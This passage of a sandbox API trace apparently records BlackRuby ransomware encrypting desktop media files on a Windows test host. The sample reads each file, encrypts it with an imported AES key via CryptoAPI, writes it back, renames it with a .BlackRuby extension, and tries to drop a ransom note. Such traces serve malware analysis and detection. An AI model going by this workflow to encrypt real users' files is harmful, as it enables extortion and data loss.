lpFilePart=0x0) returned 0x55 [0056.385] GetLastError () returned 0xb7 [0056.385] SetErrorMode (uMode=0x1) returned 0x0 [0056.385] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WIyMiI73.gif" (normalized: "c:\\users\\eebsym5\\desktop\\wiymii73.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf638e0, ftCreationTime.dwHighDateTime=0x1d3511f, ftLastAccessTime.dwLowDateTime=0xaf60e870, ftLastAccessTime.dwHighDateTime=0x1d35017, ftLastWriteTime.dwLowDateTime=0x29cddaa0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x6860)) returned 1 [0056.386] GetLastError () returned 0xb7 [0056.386] SetErrorMode (uMode=0x0) returned 0x1 [0056.386] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\WIyMiI73.gif" (normalized: "c:\\users\\eebsym5\\desktop\\wiymii73.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_Ayxx7tumndJIsujHK1sTa3eazzbvPJib7QoTyvc4.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_ayxx7tumndjisujhk1sta3eazzbvpjib7qotyvc4.blackruby")) returned 1 [0056.386] GetLastError () returned 0xb7 [0056.387] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.387] GetLastError () returned 0xb7 [0056.387] SetErrorMode (uMode=0x1) returned 0x0 [0056.387] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.387] GetLastError () returned 0x5 [0056.388] SetErrorMode (uMode=0x0) returned 0x1 [0056.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wpf_81on.m4a", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\wpf_81on.m4a", lpFilePart=0x0) returned 0x25 [0056.388] GetLastError () returned 0x5 [0056.388] SetErrorMode (uMode=0x1) returned 0x0 [0056.388] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wpf_81on.m4a" (normalized: "c:\\users\\eebsym5\\desktop\\wpf_81on.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1bfde78 | out: lpFileInformation=0x1bfde78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d919670, ftCreationTime.dwHighDateTime=0x1d357f6, ftLastAccessTime.dwLowDateTime=0x9dd8ac40, ftLastAccessTime.dwHighDateTime=0x1d34b86, ftLastWriteTime.dwLowDateTime=0x9dd8ac40, ftLastWriteTime.dwHighDateTime=0x1d34b86, nFileSizeHigh=0x0, nFileSizeLow=0x174fc)) returned 1 [0056.388] GetLastError () returned 0x5 [0056.388] SetErrorMode (uMode=0x0) returned 0x1 [0056.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.388] GetLastError () returned 0x5 [0056.388] SetErrorMode (uMode=0x1) returned 0x0 [0056.388] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.389] GetLastError () returned 0x5 [0056.389] SetErrorMode (uMode=0x0) returned 0x1 [0056.389] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", lpFilePart=0x0) returned 0x2a [0056.389] GetLastError () returned 0x5 [0056.389] SetErrorMode (uMode=0x1) returned 0x0 [0056.389] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\wtrygerjgax4v.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1c1b998 | out: lpFileInformation=0x1c1b998*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67257090, ftCreationTime.dwHighDateTime=0x1d34ef4, ftLastAccessTime.dwLowDateTime=0x10074d60, ftLastAccessTime.dwHighDateTime=0x1d34b2a, ftLastWriteTime.dwLowDateTime=0x10074d60, ftLastWriteTime.dwHighDateTime=0x1d34b2a, nFileSizeHigh=0x0, nFileSizeLow=0xe050)) returned 1 [0056.390] GetLastError () returned 0x5 [0056.390] SetErrorMode (uMode=0x0) returned 0x1 [0056.390] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", lpFilePart=0x0) returned 0x2a [0056.390] GetLastError () returned 0x5 [0056.390] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", lpFilePart=0x0) returned 0x2a [0056.390] GetLastError () returned 0x5 [0056.390] SetErrorMode (uMode=0x1) returned 0x0 [0056.390] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\wtrygerjgax4v.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.390] GetLastError () returned 0x0 [0056.390] GetFileType (hFile=0x184) returned 0x1 [0056.390] SetErrorMode (uMode=0x0) returned 0x1 [0056.390] GetFileType (hFile=0x184) returned 0x1 [0056.390] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xe050 [0056.390] GetLastError () returned 0x0 [0056.390] ReadFile (in: hFile=0x184, lpBuffer=0x1c1d7ac, nNumberOfBytesToRead=0xe050, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c1d7ac*, lpNumberOfBytesRead=0x18ed84*=0xe050, lpOverlapped=0x0) returned 1 [0056.391] GetLastError () returned 0x0 [0056.391] CloseHandle (hObject=0x184) returned 1 [0056.391] GetLastError () returned 0x0 [0056.391] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", lpFilePart=0x0) returned 0x2a [0056.391] GetLastError () returned 0x0 [0056.391] SetErrorMode (uMode=0x1) returned 0x0 [0056.391] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\wtrygerjgax4v.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67257090, ftCreationTime.dwHighDateTime=0x1d34ef4, ftLastAccessTime.dwLowDateTime=0x10074d60, ftLastAccessTime.dwHighDateTime=0x1d34b2a, ftLastWriteTime.dwLowDateTime=0x10074d60, ftLastWriteTime.dwHighDateTime=0x1d34b2a, nFileSizeHigh=0x0, nFileSizeLow=0xe050)) returned 1 [0056.391] GetLastError () returned 0x0 [0056.391] SetErrorMode (uMode=0x0) returned 0x1 [0056.402] CryptImportKey (in: hProv=0x37c680, pbData=0x1c93c00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0056.402] GetLastError () returned 0x0 [0056.402] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.402] GetLastError () returned 0x0 [0056.407] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.407] GetLastError () returned 0x0 [0056.407] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360aa0) returned 1 [0056.408] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.408] GetLastError () returned 0x0 [0056.408] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1cc0c4c*=0x1, dwFlags=0x0) returned 1 [0056.408] GetLastError () returned 0x0 [0056.408] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1cc0c18, dwFlags=0x0) returned 1 [0056.408] GetLastError () returned 0x0 [0056.408] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc0c94*, pdwDataLen=0x18ed74*=0xe150, dwBufLen=0xe150 | out: pbData=0x1cc0c94*, pdwDataLen=0x18ed74*=0xe150) returned 1 [0056.408] GetLastError () returned 0x0 [0056.408] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cdcf60*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cdcf60*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.408] GetLastError () returned 0x0 [0056.408] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cdcf90*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cdcf90*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.408] GetLastError () returned 0x0 [0056.409] CryptDestroyKey (hKey=0x360fa0) returned 1 [0056.409] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.409] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.409] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", lpFilePart=0x0) returned 0x2a [0056.409] GetLastError () returned 0x0 [0056.409] SetErrorMode (uMode=0x1) returned 0x0 [0056.410] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\wtrygerjgax4v.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.411] GetLastError () returned 0xb7 [0056.411] GetFileType (hFile=0x184) returned 0x1 [0056.411] SetErrorMode (uMode=0x0) returned 0x1 [0056.411] GetFileType (hFile=0x184) returned 0x1 [0056.411] WriteFile (in: hFile=0x184, lpBuffer=0x1cdcfc0*, nNumberOfBytesToWrite=0xe160, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1cdcfc0*, lpNumberOfBytesWritten=0x18ed90*=0xe160, lpOverlapped=0x0) returned 1 [0056.413] GetLastError () returned 0xb7 [0056.413] CloseHandle (hObject=0x184) returned 1 [0056.414] GetLastError () returned 0xb7 [0056.414] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3", lpFilePart=0x0) returned 0x2a [0056.414] GetLastError () returned 0xb7 [0056.414] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_f9mjIVzTlWEvn7ScrFgaroi7ZX7cSIq7FTnZKnkN.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_f9mjIVzTlWEvn7ScrFgaroi7ZX7cSIq7FTnZKnkN.BlackRuby", lpFilePart=0x0) returned 0x55 [0056.414] GetLastError () returned 0xb7 [0056.414] SetErrorMode (uMode=0x1) returned 0x0 [0056.414] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\wtrygerjgax4v.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67257090, ftCreationTime.dwHighDateTime=0x1d34ef4, ftLastAccessTime.dwLowDateTime=0x10074d60, ftLastAccessTime.dwHighDateTime=0x1d34b2a, ftLastWriteTime.dwLowDateTime=0x29d29d60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xe160)) returned 1 [0056.414] GetLastError () returned 0xb7 [0056.414] SetErrorMode (uMode=0x0) returned 0x1 [0056.414] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\WTrygeRjGax4v.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\wtrygerjgax4v.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_f9mjIVzTlWEvn7ScrFgaroi7ZX7cSIq7FTnZKnkN.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_f9mjivztlwevn7scrfgaroi7zx7csiq7ftnzknkn.blackruby")) returned 1 [0056.415] GetLastError () returned 0xb7 [0056.416] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.416] GetLastError () returned 0xb7 [0056.416] SetErrorMode (uMode=0x1) returned 0x0 [0056.416] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.416] GetLastError () returned 0x5 [0056.417] SetErrorMode (uMode=0x0) returned 0x1 [0056.417] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", lpFilePart=0x0) returned 0x2c [0056.417] GetLastError () returned 0x5 [0056.417] SetErrorMode (uMode=0x1) returned 0x0 [0056.418] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\y7perkcdaj95m57.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1d081ec | out: lpFileInformation=0x1d081ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee394d40, ftCreationTime.dwHighDateTime=0x1d35043, ftLastAccessTime.dwLowDateTime=0x9162a610, ftLastAccessTime.dwHighDateTime=0x1d35030, ftLastWriteTime.dwLowDateTime=0x9162a610, ftLastWriteTime.dwHighDateTime=0x1d35030, nFileSizeHigh=0x0, nFileSizeLow=0x153d5)) returned 1 [0056.418] GetLastError () returned 0x5 [0056.418] SetErrorMode (uMode=0x0) returned 0x1 [0056.418] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", lpFilePart=0x0) returned 0x2c [0056.418] GetLastError () returned 0x5 [0056.418] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", lpFilePart=0x0) returned 0x2c [0056.418] GetLastError () returned 0x5 [0056.418] SetErrorMode (uMode=0x1) returned 0x0 [0056.418] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\y7perkcdaj95m57.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.418] GetLastError () returned 0x0 [0056.418] GetFileType (hFile=0x184) returned 0x1 [0056.418] SetErrorMode (uMode=0x0) returned 0x1 [0056.418] GetFileType (hFile=0x184) returned 0x1 [0056.418] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x153d5 [0056.418] GetLastError () returned 0x0 [0056.419] ReadFile (in: hFile=0x184, lpBuffer=0x2cd56e0, nNumberOfBytesToRead=0x153d5, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2cd56e0*, lpNumberOfBytesRead=0x18ed84*=0x153d5, lpOverlapped=0x0) returned 1 [0056.420] GetLastError () returned 0x0 [0056.420] CloseHandle (hObject=0x184) returned 1 [0056.420] GetLastError () returned 0x0 [0056.421] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", lpFilePart=0x0) returned 0x2c [0056.421] GetLastError () returned 0x0 [0056.421] SetErrorMode (uMode=0x1) returned 0x0 [0056.421] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\y7perkcdaj95m57.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee394d40, ftCreationTime.dwHighDateTime=0x1d35043, ftLastAccessTime.dwLowDateTime=0x9162a610, ftLastAccessTime.dwHighDateTime=0x1d35030, ftLastWriteTime.dwLowDateTime=0x9162a610, ftLastWriteTime.dwHighDateTime=0x1d35030, nFileSizeHigh=0x0, nFileSizeLow=0x153d5)) returned 1 [0056.421] GetLastError () returned 0x0 [0056.421] SetErrorMode (uMode=0x0) returned 0x1 [0056.421] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0056.422] GetLastError () returned 0x0 [0056.458] CryptImportKey (in: hProv=0x37c790, pbData=0x1b5d6fc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x3609e0) returned 1 [0056.458] GetLastError () returned 0x0 [0056.458] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.458] GetLastError () returned 0x0 [0056.463] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.463] GetLastError () returned 0x0 [0056.463] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ce0) returned 1 [0056.463] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.463] GetLastError () returned 0x0 [0056.463] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1b8a748*=0x1, dwFlags=0x0) returned 1 [0056.463] GetLastError () returned 0x0 [0056.463] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1b8a714, dwFlags=0x0) returned 1 [0056.463] GetLastError () returned 0x0 [0056.464] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cfffd0*, pdwDataLen=0x18ed74*=0x154d0, dwBufLen=0x154d0 | out: pbData=0x2cfffd0*, pdwDataLen=0x18ed74*=0x154d0) returned 1 [0056.465] GetLastError () returned 0x0 [0056.466] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b8a7a4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b8a7a4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.466] GetLastError () returned 0x0 [0056.466] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b8a7d4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b8a7d4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.466] GetLastError () returned 0x0 [0056.468] CryptDestroyKey (hKey=0x3609e0) returned 1 [0056.468] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.468] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.468] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", lpFilePart=0x0) returned 0x2c [0056.468] GetLastError () returned 0x0 [0056.468] SetErrorMode (uMode=0x1) returned 0x0 [0056.468] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\y7perkcdaj95m57.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.470] GetLastError () returned 0xb7 [0056.470] GetFileType (hFile=0x184) returned 0x1 [0056.470] SetErrorMode (uMode=0x0) returned 0x1 [0056.470] GetFileType (hFile=0x184) returned 0x1 [0056.472] CloseHandle (hObject=0x184) returned 1 [0056.472] GetLastError () returned 0xb7 [0056.472] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv", lpFilePart=0x0) returned 0x2c [0056.472] GetLastError () returned 0xb7 [0056.472] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_4VbAGq3QY7DvRVR5h86qiDtE04vSE8Gy4eB69.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_4VbAGq3QY7DvRVR5h86qiDtE04vSE8Gy4eB69.BlackRuby", lpFilePart=0x0) returned 0x52 [0056.472] GetLastError () returned 0xb7 [0056.472] SetErrorMode (uMode=0x1) returned 0x0 [0056.472] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\y7perkcdaj95m57.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee394d40, ftCreationTime.dwHighDateTime=0x1d35043, ftLastAccessTime.dwLowDateTime=0x9162a610, ftLastAccessTime.dwHighDateTime=0x1d35030, ftLastWriteTime.dwLowDateTime=0x29d9c180, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x154e0)) returned 1 [0056.472] GetLastError () returned 0xb7 [0056.472] SetErrorMode (uMode=0x0) returned 0x1 [0056.472] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\y7pErKCDaJ95m57.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\y7perkcdaj95m57.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_4VbAGq3QY7DvRVR5h86qiDtE04vSE8Gy4eB69.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_4vbagq3qy7dvrvr5h86qidte04vse8gy4eb69.blackruby")) returned 1 [0056.473] GetLastError () returned 0xb7 [0056.473] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.473] GetLastError () returned 0xb7 [0056.473] SetErrorMode (uMode=0x1) returned 0x0 [0056.473] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.473] GetLastError () returned 0x5 [0056.474] SetErrorMode (uMode=0x0) returned 0x1 [0056.474] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", lpFilePart=0x0) returned 0x22 [0056.474] GetLastError () returned 0x5 [0056.474] SetErrorMode (uMode=0x1) returned 0x0 [0056.474] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi" (normalized: "c:\\users\\eebsym5\\desktop\\yatms.avi"), fInfoLevelId=0x0, lpFileInformation=0x1ba78cc | out: lpFileInformation=0x1ba78cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd523b0c0, ftCreationTime.dwHighDateTime=0x1d356e2, ftLastAccessTime.dwLowDateTime=0x16d1dbd0, ftLastAccessTime.dwHighDateTime=0x1d34f01, ftLastWriteTime.dwLowDateTime=0x16d1dbd0, ftLastWriteTime.dwHighDateTime=0x1d34f01, nFileSizeHigh=0x0, nFileSizeLow=0x3491)) returned 1 [0056.475] GetLastError () returned 0x5 [0056.475] SetErrorMode (uMode=0x0) returned 0x1 [0056.475] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", lpFilePart=0x0) returned 0x22 [0056.475] GetLastError () returned 0x5 [0056.475] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", lpFilePart=0x0) returned 0x22 [0056.475] GetLastError () returned 0x5 [0056.475] SetErrorMode (uMode=0x1) returned 0x0 [0056.475] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi" (normalized: "c:\\users\\eebsym5\\desktop\\yatms.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.475] GetLastError () returned 